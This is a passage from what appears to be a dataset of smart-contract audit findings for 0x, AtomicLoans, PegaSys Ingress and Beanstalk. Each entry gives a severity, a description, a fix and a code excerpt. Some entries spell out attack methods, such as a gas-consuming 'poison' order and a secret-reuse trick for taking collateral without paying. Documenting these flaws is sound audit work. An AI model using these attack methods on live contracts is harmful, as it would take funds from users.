fullyConfirmed(transactionId)\\n```\\n -Reentrancy in executeTransaction() Won't FixчmediumчIn `MixinTransactions`, `executeTransaction()` and `batchExecuteTransactions()` do not have the `nonReentrant` modifier. Because of that, it is possible to execute nested transactions or call these functions during other reentrancy attacks on the exchange. The reason behind that decision is to be able to call functions with `nonReentrant` modifier as delegated transactions.\\nNested transactions are partially prevented with a separate check that does not allow transaction execution if the exchange is currently in somebody else's context:\\n```\\n// Prevent `executeTransaction` from being called when context is already set\\naddress currentContextAddress\\_ = currentContextAddress;\\nif (currentContextAddress\\_ != address(0)) {\\n LibRichErrors.rrevert(LibExchangeRichErrors.TransactionInvalidContextError(\\n transactionHash,\\n currentContextAddress\\_\\n ));\\n}\\n```\\n\\nThis check still leaves some possibility of reentrancy. Allowing that behavior is dangerous and may create possible attack vectors in the future.чAdd a new modifier to `executeTransaction()` and `batchExecuteTransactions()` which is similar to `nonReentrant` but uses different storage slot.чч```\\n// Prevent `executeTransaction` from being called when context is already set\\naddress currentContextAddress\\_ = currentContextAddress;\\nif (currentContextAddress\\_ != address(0)) {\\n LibRichErrors.rrevert(LibExchangeRichErrors.TransactionInvalidContextError(\\n transactionHash,\\n currentContextAddress\\_\\n ));\\n}\\n```\\n -“Poison” order that consumes gas can block market trades Won't FixчmediumчThe market buy/sell functions gather a list of orders together for the same asset and try to fill them in order until a target amount has been traded.\\nThese functions use `MixinWrapperFunctions._fillOrderNoThrow()` to attempt to fill each order but ignore failures. This way, if one order is unfillable for some reason, the overall market order can still succeed by filling other orders.\\nOrders can still force `_fillOrderNoThrow()` to revert by using an external contract for signature validation and having that contract consume all available gas.\\nThis makes it possible to advertise a “poison” order for a low price that will block all market orders from succeeding. It's reasonable to assume that off-chain order books will automatically include the best prices when constructing market orders, so this attack would likely be quite effective. Note that such an attack costs the attacker nothing because all they need is an on-chain contract that consumers all available gas (maybe via an assert). This makes it a very appealing attack vector for, e.g., an order book that wants to temporarily disable a competitor.\\nDetails\\n`_fillOrderNoThrow()` forwards all available gas when filling the order:\\n```\\n// ABI encode calldata for `fillOrder`\\nbytes memory fillOrderCalldata = abi.encodeWithSelector(\\n IExchangeCore(address(0)).fillOrder.selector,\\n order,\\n takerAssetFillAmount,\\n signature\\n);\\n\\n(bool didSucceed, bytes memory returnData) = address(this).delegatecall(fillOrderCalldata);\\n```\\n\\nSimilarly, when the `Exchange` attempts to fill an order that requires external signature validation (Wallet, `Validator`, or `EIP1271Wallet` signature types), it forwards all available gas:\\n```\\n(bool didSucceed, bytes memory returnData) = verifyingContractAddress.staticcall(callData);\\n```\\n\\nIf the verifying contract consumes all available gas, it can force the overall transaction to revert.\\nPedantic Note\\nTechnically, it's impossible to consume all remaining gas when called by another contract because the EVM holds back a small amount, but even at the block gas limit, the amount held back would be insufficient to complete the transaction.чConstrain the gas that is forwarded during signature validation. This can be constrained either as a part of the signature or as a parameter provided by the taker.чч```\\n// ABI encode calldata for `fillOrder`\\nbytes memory fillOrderCalldata = abi.encodeWithSelector(\\n IExchangeCore(address(0)).fillOrder.selector,\\n order,\\n takerAssetFillAmount,\\n signature\\n);\\n\\n(bool didSucceed, bytes memory returnData) = address(this).delegatecall(fillOrderCalldata);\\n```\\n -Front running in matchOrders() Won't FixчmediumчCalls to `matchOrders()` are made to extract profit from the price difference between two opposite orders: left and right.\\n```\\nfunction matchOrders(\\n LibOrder.Order memory leftOrder,\\n LibOrder.Order memory rightOrder,\\n bytes memory leftSignature,\\n bytes memory rightSignature\\n)\\n```\\n\\nThe caller only pays protocol and transaction fees, so it's almost always profitable to front run every call to `matchOrders()`. That would lead to gas auctions and would make `matchOrders()` difficult to use.чConsider adding a commit-reveal scheme to `matchOrders()` to stop front running altogether.чч```\\nfunction matchOrders(\\n LibOrder.Order memory leftOrder,\\n LibOrder.Order memory rightOrder,\\n bytes memory leftSignature,\\n bytes memory rightSignature\\n)\\n```\\n -The Exchange owner should not be able to call executeTransaction or batchExecuteTransaction Won't FixчmediumчIf the owner calls either of these functions, the resulting `delegatecall` can pass `onlyOwner` modifiers even if the transaction signer is not the owner. This is because, regardless of the `contextAddress` set through `_executeTransaction`, the `onlyOwner` modifier checks `msg.sender`.\\n`_executeTransaction` sets the context address to the signer address, which is not `msg.sender` in this case:\\n```\\n// Set the current transaction signer\\naddress signerAddress = transaction.signerAddress;\\n\\_setCurrentContextAddressIfRequired(signerAddress, signerAddress);\\n```\\n\\nThe resulting `delegatecall` could target an admin function like this one:\\n```\\n/// @dev Registers an asset proxy to its asset proxy id.\\n/// Once an asset proxy is registered, it cannot be unregistered.\\n/// @param assetProxy Address of new asset proxy to register.\\nfunction registerAssetProxy(address assetProxy)\\n external\\n onlyOwner\\n{\\n // Ensure that no asset proxy exists with current id.\\n bytes4 assetProxyId = IAssetProxy(assetProxy).getProxyId();\\n address currentAssetProxy = \\_assetProxies[assetProxyId];\\n if (currentAssetProxy != address(0)) {\\n LibRichErrors.rrevert(LibExchangeRichErrors.AssetProxyExistsError(\\n assetProxyId,\\n currentAssetProxy\\n ));\\n }\\n \\n // Add asset proxy and log registration.\\n \\_assetProxies[assetProxyId] = assetProxy;\\n emit AssetProxyRegistered(\\n assetProxyId,\\n assetProxy\\n );\\n}\\n```\\n\\nThe `onlyOwner` modifier does not check the context address, but checks msg.sender:\\n```\\nfunction \\_assertSenderIsOwner()\\n internal\\n view\\n{\\n if (msg.sender != owner) {\\n LibRichErrors.rrevert(LibOwnableRichErrors.OnlyOwnerError(\\n msg.sender,\\n owner\\n ));\\n }\\n}\\n```\\nчAdd a check to `_executeTransaction` that prevents the owner from calling this function.чч```\\n// Set the current transaction signer\\naddress signerAddress = transaction.signerAddress;\\n\\_setCurrentContextAddressIfRequired(signerAddress, signerAddress);\\n```\\n -By manipulating the gas limit, relayers can affect the outcome of ZeroExTransactions Won't FixчlowчZeroExTransactions are meta transactions supported by the `Exchange`. They do not require that they are executed with a specific amount of gas, so the transaction relayer can choose how much gas to provide. By choosing a low gas limit, a relayer can affect the outcome of the transaction.\\nA `ZeroExTransaction` specifies a signer, an expiration, and call data for the transaction:\\n```\\nstruct ZeroExTransaction {\\n uint256 salt; // Arbitrary number to ensure uniqueness of transaction hash.\\n uint256 expirationTimeSeconds; // Timestamp in seconds at which transaction expires.\\n uint256 gasPrice; // gasPrice that transaction is required to be executed with.\\n address signerAddress; // Address of transaction signer.\\n bytes data; // AbiV2 encoded calldata.\\n}\\n```\\n\\nIn `MixinTransactions._executeTransaction()`, all available gas is forwarded in the delegate call, and the transaction is marked as executed:\\n```\\ntransactionsExecuted[transactionHash] = true;\\n(bool didSucceed, bytes memory returnData) = address(this).delegatecall(transaction.data);\\n```\\n\\nA likely attack vector for this is front running a `ZeroExTransaction` that ultimately invokes `_fillNoThrow()`. In this scenario, an attacker sees the call to `executeTransaction()` and makes their own call with a lower gas limit, causing the order being filled to run out of gas but allowing the transaction as a whole to succeed.\\nIf such an attack is successful, the `ZeroExTransaction` cannot be replayed, so the signer must produce a new signature and try again, ad infinitum.чResolution\\nFrom the development team:\\nWhile this is an annoyance when used in combination with `marketBuyOrdersNoThrow` and `marketSellOrdersNoThrow`, it does not seem worth it to add a `gasLimit` to 0x transactions for this reason alone. Instead, this quirk should be documented along with a recommendation to use the `fillOrKill` variants of each market fill function when used in combination with 0x transactions.\\nAdd a `gasLimit` field to `ZeroExTransaction` and forward exactly that much gas via `delegatecall`. (Note that you must explicitly check that sufficient gas is available because the EVM allows you to supply a gas parameter that exceeds the actual remaining gas.)чч```\\nstruct ZeroExTransaction {\\n uint256 salt; // Arbitrary number to ensure uniqueness of transaction hash.\\n uint256 expirationTimeSeconds; // Timestamp in seconds at which transaction expires.\\n uint256 gasPrice; // gasPrice that transaction is required to be executed with.\\n address signerAddress; // Address of transaction signer.\\n bytes data; // AbiV2 encoded calldata.\\n}\\n```\\n -Modifier ordering plays a significant role in modifier efficacyчlowчThe `nonReentrant` and `refundFinalBalance` modifiers always appear together across the 0x monorepo. When used, they invariably appear with `nonReentrant` listed first, followed by `refundFinalBalance`. This specific order appears inconsequential at first glance but is actually important. The order of execution is as follows:\\nThe `nonReentrant` modifier runs (_lockMutexOrThrowIfAlreadyLocked).\\nIf `refundFinalBalance` had a prefix, it would run now.\\nThe function itself runs.\\nThe `refundFinalBalance` modifier runs (_refundNonZeroBalanceIfEnabled).\\nThe `nonReentrant` modifier runs (_unlockMutex).\\nThe fact that the `refundFinalBalance` modifier runs before the mutex is unlocked is of particular importance because it potentially invokes an external call, which may reenter. If the order of the two modifiers were flipped, the mutex would unlock before the external call, defeating the purpose of the reentrancy guard.\\n```\\nnonReentrant\\nrefundFinalBalance\\n```\\nчResolution\\nThis is fixed in 0xProject/0x-monorepo#2228 by introducing a new modifier that combines the two: `refundFinalBalance`.\\nAlthough the order of the modifiers is correct as-is, this pattern introduces cognitive overhead when making or reviewing changes to the 0x codebase. Because the two modifiers always appear together, it may make sense to combine the two into a single modifier where the order of operations is explicit.чч```\\nnonReentrant\\nrefundFinalBalance\\n```\\n -Several overflows in LibBytesчlowчSeveral functions in `LibBytes` have integer overflows.\\n`LibBytes.readBytesWithLength` returns a pointer to a `bytes` array within an existing `bytes` array at some given `index`. The length of the nested array is added to the given `index` and checked against the parent array to ensure the data in the nested array is within the bounds of the parent. However, because the addition can overflow, the bounds check can be bypassed to return an array that points to data out of bounds of the parent array.\\n```\\nif (b.length < index + nestedBytesLength) {\\n LibRichErrors.rrevert(LibBytesRichErrors.InvalidByteOperationError(\\n LibBytesRichErrors\\n .InvalidByteOperationErrorCodes.LengthGreaterThanOrEqualsNestedBytesLengthRequired,\\n b.length,\\n index + nestedBytesLength\\n ));\\n}\\n```\\n\\nThe following functions have similar issues:\\n`readAddress`\\n`writeAddress`\\n`readBytes32`\\n`writeBytes32`\\n`readBytes4`чAn overflow check should be added to the function. Alternatively, because `readBytesWithLength` does not appear to be used anywhere in the 0x project, the function should be removed from `LibBytes`. Additionally, the following functions in `LibBytes` are also not used and should be considered for removal:\\n`popLast20Bytes`\\n`writeAddress`\\n`writeBytes32`\\n`writeUint256`\\n`writeBytesWithLength`\\n`deepCopyBytes`чч```\\nif (b.length < index + nestedBytesLength) {\\n LibRichErrors.rrevert(LibBytesRichErrors.InvalidByteOperationError(\\n LibBytesRichErrors\\n .InvalidByteOperationErrorCodes.LengthGreaterThanOrEqualsNestedBytesLengthRequired,\\n b.length,\\n index + nestedBytesLength\\n ));\\n}\\n```\\n -NSignatureTypes enum value bypasses Solidity safety checks Won't FixчlowчThe `ISignatureValidator` contract defines an enum `SignatureType` to represent the different types of signatures recognized within the exchange. The final enum value, `NSignatureTypes`, is not a valid signature type. Instead, it is used by `MixinSignatureValidator` to check that the value read from the signature is a valid enum value. However, Solidity now includes its own check for enum casting, and casting a value over the maximum enum size to an enum is no longer possible.\\nBecause of the added `NSignatureTypes` value, Solidity's check now recognizes `0x08` as a valid `SignatureType` value.\\nThe check is made here:\\n```\\n// Ensure signature is supported\\nif (uint8(signatureType) >= uint8(SignatureType.NSignatureTypes)) {\\n LibRichErrors.rrevert(LibExchangeRichErrors.SignatureError(\\n LibExchangeRichErrors.SignatureErrorCodes.UNSUPPORTED,\\n hash,\\n signerAddress,\\n signature\\n ));\\n}\\n```\\nчThe check should be removed, as should the `SignatureTypes.NSignatureTypes` value.чч```\\n// Ensure signature is supported\\nif (uint8(signatureType) >= uint8(SignatureType.NSignatureTypes)) {\\n LibRichErrors.rrevert(LibExchangeRichErrors.SignatureError(\\n LibExchangeRichErrors.SignatureErrorCodes.UNSUPPORTED,\\n hash,\\n signerAddress,\\n signature\\n ));\\n}\\n```\\n -Intentional secret reuse can block borrower and lender from accepting liquidation paymentчhighчFor Dave (the liquidator) to claim the collateral he's purchasing, he must reveal secret D. Once that secret is revealed, Alice and Bob (the borrower and lender) can claim the payment.\\nSecrets must be provided via the `Sales.provideSecret()` function:\\n```\\n function provideSecret(bytes32 sale, bytes32 secret\\_) external {\\n require(sales[sale].set);\\n if (sha256(abi.encodePacked(secret\\_)) == secretHashes[sale].secretHashA) { secretHashes[sale].secretA = secret\\_; }\\n else if (sha256(abi.encodePacked(secret\\_)) == secretHashes[sale].secretHashB) { secretHashes[sale].secretB = secret\\_; }\\n else if (sha256(abi.encodePacked(secret\\_)) == secretHashes[sale].secretHashC) { secretHashes[sale].secretC = secret\\_; }\\n else if (sha256(abi.encodePacked(secret\\_)) == secretHashes[sale].secretHashD) { secretHashes[sale].secretD = secret\\_; }\\n else { revert(); }\\n }\\n```\\n\\nNote that if Dave chooses the same secret hash as either Alice, Bob, or Charlie (arbiter), there is no way to set `secretHashes[sale].secretD` because one of the earlier conditionals will execute.\\nFor Alice and Bob to later receive payment, they must be able to provide Dave's secret:\\n```\\n function accept(bytes32 sale) external {\\n require(!accepted(sale));\\n require(!off(sale));\\n require(hasSecrets(sale));\\n require(sha256(abi.encodePacked(secretHashes[sale].secretD)) == secretHashes[sale].secretHashD);\\n```\\n\\nDave can exploit this to obtain the collateral for free:\\nDave looks at Alice's secret hashes to see which will be used in the sale.\\nDave begins the liquidation process, using the same secret hash.\\nAlice and Bob reveal their secrets A and B through the process of moving the collateral.\\nDave now knows the preimage for the secret hash he provided. It was revealed by Alice already.\\nDave uses that secret to obtain the collateral.\\nAlice and Bob now want to receive payment, but they're unable to provide Dave's secret to the `Sales` smart contract due to the order of conditionals in `provideSecret()`.\\nAfter an expiration, Dave can claim a refund.\\nMitigating factors\\nAlice and Bob could notice that Dave chose a duplicate secret hash and refuse to proceed with the sale. This is not something they are likely to do.чEither change the way `provideSecret()` works to allow for duplicate secret hashes or reject duplicate hashes in `create()`.чч```\\n function provideSecret(bytes32 sale, bytes32 secret\\_) external {\\n require(sales[sale].set);\\n if (sha256(abi.encodePacked(secret\\_)) == secretHashes[sale].secretHashA) { secretHashes[sale].secretA = secret\\_; }\\n else if (sha256(abi.encodePacked(secret\\_)) == secretHashes[sale].secretHashB) { secretHashes[sale].secretB = secret\\_; }\\n else if (sha256(abi.encodePacked(secret\\_)) == secretHashes[sale].secretHashC) { secretHashes[sale].secretC = secret\\_; }\\n else if (sha256(abi.encodePacked(secret\\_)) == secretHashes[sale].secretHashD) { secretHashes[sale].secretD = secret\\_; }\\n else { revert(); }\\n }\\n```\\n -There is no way to convert between custom and non-custom funds Won't FixчmediumчEach fund is created using either `Funds.create()` or `Funds.createCustom()`. Both enforce a limitation that there can only be one fund per account:\\n```\\nfunction create(\\n uint256 maxLoanDur\\_,\\n uint256 maxFundDur\\_,\\n address arbiter\\_,\\n bool compoundEnabled\\_,\\n uint256 amount\\_\\n) external returns (bytes32 fund) {\\n require(fundOwner[msg.sender].lender != msg.sender || msg.sender == deployer); // Only allow one loan fund per address\\n```\\n\\n```\\nfunction createCustom(\\n uint256 minLoanAmt\\_,\\n uint256 maxLoanAmt\\_,\\n uint256 minLoanDur\\_,\\n uint256 maxLoanDur\\_,\\n uint256 maxFundDur\\_,\\n uint256 liquidationRatio\\_,\\n uint256 interest\\_,\\n uint256 penalty\\_,\\n uint256 fee\\_,\\n address arbiter\\_,\\n bool compoundEnabled\\_,\\n uint256 amount\\_\\n) external returns (bytes32 fund) {\\n require(fundOwner[msg.sender].lender != msg.sender || msg.sender == deployer); // Only allow one loan fund per address\\n```\\n\\nThese functions are the only place where `bools[fund].custom` is set, and there's no way to delete a fund once it exists. This means there's no way for a given account to switch between a custom and non-custom fund.\\nThis could be a problem if, for example, the default parameters change in a way that a user finds unappealing. They may want to switch to using a custom fund but find themselves unable to do so without moving to a new Ethereum account.чEither allow funds to be deleted or allow funds to be switched between custom and non-custom.чч```\\nfunction create(\\n uint256 maxLoanDur\\_,\\n uint256 maxFundDur\\_,\\n address arbiter\\_,\\n bool compoundEnabled\\_,\\n uint256 amount\\_\\n) external returns (bytes32 fund) {\\n require(fundOwner[msg.sender].lender != msg.sender || msg.sender == deployer); // Only allow one loan fund per address\\n```\\n -Funds.maxFundDur has no effect if maxLoanDur is setчmediumч`Funds.maxFundDur` specifies the maximum amount of time a fund should be active. It's checked in `request()` to ensure the duration of the loan won't exceed that time, but the check is skipped if `maxLoanDur` is set:\\n```\\nif (maxLoanDur(fund) > 0) {\\n require(loanDur\\_ <= maxLoanDur(fund));\\n} else {\\n require(now + loanDur\\_ <= maxFundDur(fund));\\n}\\n```\\n\\nIf a user sets `maxLoanDur` (the maximum loan duration) to 1 week and sets the `maxFundDur` (timestamp when all loans should be complete) to December 1st, then there can actually be a loan that ends on December 7th.чCheck against `maxFundDur` even when `maxLoanDur` is set.чч```\\nif (maxLoanDur(fund) > 0) {\\n require(loanDur\\_ <= maxLoanDur(fund));\\n} else {\\n require(now + loanDur\\_ <= maxFundDur(fund));\\n}\\n```\\n -Funds.update() lets users update fields that may not have any effectчlowч`Funds.update()` allows users to update the following fields which are only used if `bools[fund].custom` is set:\\n`minLoanamt`\\n`maxLoanAmt`\\n`minLoanDur`\\n`interest`\\n`penalty`\\n`fee`\\n`liquidationRatio`\\nIf `bools[fund].custom` is not set, then these changes have no effect. This may be misleading to users.\\n```\\nfunction update(\\n bytes32 fund,\\n uint256 minLoanAmt\\_,\\n uint256 maxLoanAmt\\_,\\n uint256 minLoanDur\\_,\\n uint256 maxLoanDur\\_,\\n uint256 maxFundDur\\_,\\n uint256 interest\\_,\\n uint256 penalty\\_,\\n uint256 fee\\_,\\n uint256 liquidationRatio\\_,\\n address arbiter\\_\\n) external {\\n require(msg.sender == lender(fund));\\n funds[fund].minLoanAmt = minLoanAmt\\_;\\n funds[fund].maxLoanAmt = maxLoanAmt\\_;\\n funds[fund].minLoanDur = minLoanDur\\_;\\n funds[fund].maxLoanDur = maxLoanDur\\_;\\n funds[fund].maxFundDur = maxFundDur\\_;\\n funds[fund].interest = interest\\_;\\n funds[fund].penalty = penalty\\_;\\n funds[fund].fee = fee\\_;\\n funds[fund].liquidationRatio = liquidationRatio\\_;\\n funds[fund].arbiter = arbiter\\_;\\n}\\n```\\nчResolution\\nThis is fixed in AtomicLoans/atomicloans-eth-contracts#67.\\nThis could be addressed by creating two update functions: one for custom funds and one for non-custom funds. Only the update for custom funds would allow setting these values.чч```\\nfunction update(\\n bytes32 fund,\\n uint256 minLoanAmt\\_,\\n uint256 maxLoanAmt\\_,\\n uint256 minLoanDur\\_,\\n uint256 maxLoanDur\\_,\\n uint256 maxFundDur\\_,\\n uint256 interest\\_,\\n uint256 penalty\\_,\\n uint256 fee\\_,\\n uint256 liquidationRatio\\_,\\n address arbiter\\_\\n) external {\\n require(msg.sender == lender(fund));\\n funds[fund].minLoanAmt = minLoanAmt\\_;\\n funds[fund].maxLoanAmt = maxLoanAmt\\_;\\n funds[fund].minLoanDur = minLoanDur\\_;\\n funds[fund].maxLoanDur = maxLoanDur\\_;\\n funds[fund].maxFundDur = maxFundDur\\_;\\n funds[fund].interest = interest\\_;\\n funds[fund].penalty = penalty\\_;\\n funds[fund].fee = fee\\_;\\n funds[fund].liquidationRatio = liquidationRatio\\_;\\n funds[fund].arbiter = arbiter\\_;\\n}\\n```\\n -Ingress.setContractAddress() can cause duplicate entries in contractKeysчmediumч`setContractAddress()` checks `ContractDetails` existence by inspecting `contractAddress`. A `contractAddress` of `0` means that the contract does not already exist, and its name must be added to contractKeys:\\n```\\nfunction setContractAddress(bytes32 name, address addr) public returns (bool) {\\n require(name > 0x0000000000000000000000000000000000000000000000000000000000000000, \"Contract name must not be empty.\");\\n require(isAuthorized(msg.sender), \"Not authorized to update contract registry.\");\\n\\n ContractDetails memory info = registry[name];\\n // create info if it doesn't exist in the registry\\n if (info.contractAddress == address(0)) {\\n info = ContractDetails({\\n owner: msg.sender,\\n contractAddress: addr\\n });\\n\\n // Update registry indexing\\n contractKeys.push(name);\\n } else {\\n info.contractAddress = addr;\\n }\\n // update record in the registry\\n registry[name] = info;\\n\\n emit RegistryUpdated(addr,name);\\n\\n return true;\\n}\\n```\\n\\nIf, however, a contract is actually added with the address `0`, which is currently allowed in the code, then the contract does already exists, and adding the name to `contractKeys` again will result in a duplicate.\\nMitigation\\nAn admin can call `removeContract` repeatedly with the same name to remove multiple duplicate entries.чResolution\\nThis is fixed in PegaSysEng/[email protected]faff726.\\nEither disallow a contract address of `0` or check for existence via the `owner` field instead (which can never be 0).чч```\\nfunction setContractAddress(bytes32 name, address addr) public returns (bool) {\\n require(name > 0x0000000000000000000000000000000000000000000000000000000000000000, \"Contract name must not be empty.\");\\n require(isAuthorized(msg.sender), \"Not authorized to update contract registry.\");\\n\\n ContractDetails memory info = registry[name];\\n // create info if it doesn't exist in the registry\\n if (info.contractAddress == address(0)) {\\n info = ContractDetails({\\n owner: msg.sender,\\n contractAddress: addr\\n });\\n\\n // Update registry indexing\\n contractKeys.push(name);\\n } else {\\n info.contractAddress = addr;\\n }\\n // update record in the registry\\n registry[name] = info;\\n\\n emit RegistryUpdated(addr,name);\\n\\n return true;\\n}\\n```\\n -Use specific contract types instead of address where possibleчlowчFor clarity and to get more out of the Solidity type checker, it's generally preferred to use a specific contract type for variables rather than the generic `address`.\\n`AccountRules.ingressContractAddress` could instead be `AccountRules.ingressContract` and use the type IngressContract:\\n```\\naddress private ingressContractAddress;\\n```\\n\\n```\\nAccountIngress ingressContract = AccountIngress(ingressContractAddress);\\n```\\n\\n```\\nconstructor (address ingressAddress) public {\\n```\\n\\nThis same pattern is found in NodeRules:\\n```\\naddress private nodeIngressContractAddress;\\n```\\nчWhere possible, use a specific contract type rather than `address`.чч```\\naddress private ingressContractAddress;\\n```\\n -Ingress should use a setчlowчThe `AdminList`, `AccountRulesList`, and `NodeRulesList` contracts have been recently rewritten to use a set. `Ingress` has the semantics of a set but has not been written the same way.\\nThis leads to some inefficiencies. In particular, `Ingress.removeContract` is an O(n) operation:\\n```\\nfor (uint i = 0; i < contractKeys.length; i++) {\\n // Delete the key from the array + mapping if it is present\\n if (contractKeys[i] == name) {\\n delete registry[contractKeys[i]];\\n contractKeys[i] = contractKeys[contractKeys.length - 1];\\n delete contractKeys[contractKeys.length - 1];\\n contractKeys.length--;\\n```\\nчUse the same set implementation for Ingress: an array of `ContractDetails` and a mapping of names to indexes in that array.чч```\\nfor (uint i = 0; i < contractKeys.length; i++) {\\n // Delete the key from the array + mapping if it is present\\n if (contractKeys[i] == name) {\\n delete registry[contractKeys[i]];\\n contractKeys[i] = contractKeys[contractKeys.length - 1];\\n delete contractKeys[contractKeys.length - 1];\\n contractKeys.length--;\\n```\\n -ContractDetails.owner is never readчlowчThe `ContractDetails` struct used by `Ingress` contracts has an `owner` field that is written to, but it is never read.\\n```\\nstruct ContractDetails {\\n address owner;\\n address contractAddress;\\n}\\n\\nmapping(bytes32 => ContractDetails) registry;\\n```\\nчResolution\\nThis is fixed in PegaSysEng/[email protected]d3f505e.\\nIf `owner` is not (yet) needed, the `ContractDetails` struct should be removed altogether and the type of `Ingress.registry` should change to `mapping(bytes32 => address)`чч```\\nstruct ContractDetails {\\n address owner;\\n address contractAddress;\\n}\\n\\nmapping(bytes32 => ContractDetails) registry;\\n```\\n -[M-2] Failure in Maintaining Gauge PointsчmediumчThe defaultGaugePointFunction in the smart contract does not explicitly handle the scenario where the percentage of the Base Deposited Value (BDV) equals the optimal percentage (optimalPercentDepositedBdv), resulting in an unintended reduction of gauge points to 0 instead of maintaining their current value.\\nThe testnew_GaugePointAdjustment() test demonstrated this flaw by providing inputs where currentGaugePoints = 1189, optimalPercentDepositedBdv = 64, and percentOfDepositedBdv = 64, expecting newGaugePoints to equal currentGaugePoints. However, the outcome was newGaugePoints = 0, indicating an unexpected reduction to zero.\\n```\\nfunction testnew_GaugePointAdjustment() public {\\n uint256 currentGaugePoints = 1189; \\n uint256 optimalPercentDepositedBdv = 64; \\n uint256 percentOfDepositedBdv = 64; \\n\\n uint256 newGaugePoints = gaugePointFacet.defaultGaugePointFunction(\\n currentGaugePoints,\\n optimalPercentDepositedBdv,\\n percentOfDepositedBdv\\n );\\n\\n assertTrue(newGaugePoints <= MAX_GAUGE_POINTS, \"New gauge points exceed the maximum allowed\");\\n assertEq(newGaugePoints, currentGaugePoints, \"Gauge points adjustment does not match expected outcome\");\\n}\\n```\\nчImplement Explicit Returns: Ensure the defaultGaugePointFunction has an explicit return for the case where gauge points should not be adjusted. This can be achieved by adding a final return statement that simply returns currentGaugePoints if neither condition for incrementing nor decrementing is met, as shown below:\\n```\\nelse {\\n return currentGaugePoints; \\n}\\n```\\nчThis behavior can lead to an undesired decrease in incentives for contract participants, potentially affecting participation and reward accumulation within the contract's ecosystem. Users may lose gauge points and, consequently, rewards due to a technical flaw rather than their actions.ч```\\nfunction testnew_GaugePointAdjustment() public {\\n uint256 currentGaugePoints = 1189; \\n uint256 optimalPercentDepositedBdv = 64; \\n uint256 percentOfDepositedBdv = 64; \\n\\n uint256 newGaugePoints = gaugePointFacet.defaultGaugePointFunction(\\n currentGaugePoints,\\n optimalPercentDepositedBdv,\\n percentOfDepositedBdv\\n );\\n\\n assertTrue(newGaugePoints <= MAX_GAUGE_POINTS, \"New gauge points exceed the maximum allowed\");\\n assertEq(newGaugePoints, currentGaugePoints, \"Gauge points adjustment does not match expected outcome\");\\n}\\n```\\n -Silo is not compatible with Fee-on-transfer or rebasing tokensчmediumчAccording to the documentation there are certain conditions that need to be met for a token to be whitelisted:\\n```\\nAdditional tokens may be added to the Deposit Whitelist via Beanstalk governance. In order for a token to be added to the Deposit Whitelist, Beanstalk requires:\\n1. The token address;\\n2. A function to calculate the Bean Denominated Value (BDV) of the token (see Section 14.2 of the whitepaper for complete formulas); and\\n3. The number of Stalk and Seeds per BDV received upon Deposit.\\n```\\n\\nThus if the community proposes any kind of Fee-on-Transfer or rebasing tokens like (PAXG or stETH) and the Beanstalk governance approves it, then the protocol needs to integrate them into the system. But as it is now the system is definitely not compatible with such tokens.\\n`deposit`, `depositWithBDV`, `addDepositToAccount`, `removeDepositFromAccount` and any other `silo` accounting related functions perform operations using inputed/recorded amounts. They don't query the existing balance of tokens before or after receiving/sending in order to properly account for tokens that shift balance when received (FoT) or shift balance over time (rebasing).чClearly state in the docs that weird tokens won't be implemented via Governance Vote or adjust the code to check the `token.balanceOf()` before and after doing any operation related to the `silo`.чLikelyhood - low/medium - At the moment of writing lido has over 31% of the ETH staked which makes `stETH` a very popular token. There's a strong chance that stakeholder would want to have `stETH` inside the silo.\\nOverall severity is medium.ч```\\nAdditional tokens may be added to the Deposit Whitelist via Beanstalk governance. In order for a token to be added to the Deposit Whitelist, Beanstalk requires:\\n1. The token address;\\n2. A function to calculate the Bean Denominated Value (BDV) of the token (see Section 14.2 of the whitepaper for complete formulas); and\\n3. The number of Stalk and Seeds per BDV received upon Deposit.\\n```\\n -`removeWhitelistStatus` function Ignores updating `milestoneSeason` variableчmediumчThe issue in the `LibWhitelistedTokens:removeWhitelistStatus` function is that it removes the Whitelist status of a token without considering the impact on other related variables, such as the `milestoneSeason` variable.\\n`milestoneSeason` Is used in many functions for checking whether a token is whitelisted or not i.e.\\n```\\n require(s.ss[token].milestoneSeason == 0, \"Whitelist: Token already whitelisted\");\\n```\\n\\nIf the milestoneSeason variable is not updated or cleared when removing the Whitelist status, it may lead to incorrect behavior in subsequent checks or operations that rely on this variable.чTo address this issue, ensure that related variables, such as `milestoneSeason`, are appropriately updated or cleared when removing the Whitelist status of a token. If the `milestoneSeason` variable is no longer relevant after removing the Whitelist status, it should be updated or cleared to maintain data integrity.ч`removeWhitelistStatus` function Ignores updating `milestoneSeason` variable\\nRemoving the Whitelist status of a token without updating related variables can lead to inconsistencies in the data stored in the contract. The `milestoneSeason` variable, used for checking whitelist status in many functions, may still hold outdated or incorrect information after removing the status, potentially leading to unexpected behavior or vulnerabilities.ч```\\n require(s.ss[token].milestoneSeason == 0, \"Whitelist: Token already whitelisted\");\\n```\\n -No validation of total supply of unripe beans & Lp in `percentBeansRecapped` & `percentLPRecapped`чlowч`LibUnripe:percentBeansRecapped` & `LibUnripe:percentLPRecapped` functions calculate the percentage of Unripe Beans and Unripe LPs that have been recapitalized, respectively. These percentages are calculated based on the underlying balance of the Unripe Tokens and their total supply. There is no check if the `totalSupply` is zero which is used as division in the calculation.\\nSee the following code for both the functions:\\n```\\n /**\\n * @notice Returns the percentage that Unripe Beans have been recapitalized.\\n */\\n function percentBeansRecapped() internal view returns (uint256 percent) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n return s.u[C.UNRIPE_BEAN].balanceOfUnderlying.mul(DECIMALS).div(C.unripeBean().totalSupply());\\n }\\n\\n /**\\n * @notice Returns the percentage that Unripe LP have been recapitalized.\\n */\\n function percentLPRecapped() internal view returns (uint256 percent) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n return C.unripeLPPerDollar().mul(s.recapitalized).div(C.unripeLP().totalSupply());\\n }\\n```\\nчTo handle this scenario, appropriate checks should be added to ensure that the `totalSupply` of Unripe Beans or LP tokens is non-zero before performing the division operation.чIf the `totalSupply` in these two functions becomes zero, the calculation of the percentage of recapitalized Unripe Beans or LP tokens would result in a division by zero error. This is because of the denominator in the calculation. When the total supply is zero, dividing by zero is not defined in Solidity, and the contract would revert with an error.\\nThese functions are used widely across the different contracts at crucial places. So they will effect a lot of functionalities.ч```\\n /**\\n * @notice Returns the percentage that Unripe Beans have been recapitalized.\\n */\\n function percentBeansRecapped() internal view returns (uint256 percent) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n return s.u[C.UNRIPE_BEAN].balanceOfUnderlying.mul(DECIMALS).div(C.unripeBean().totalSupply());\\n }\\n\\n /**\\n * @notice Returns the percentage that Unripe LP have been recapitalized.\\n */\\n function percentLPRecapped() internal view returns (uint256 percent) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n return 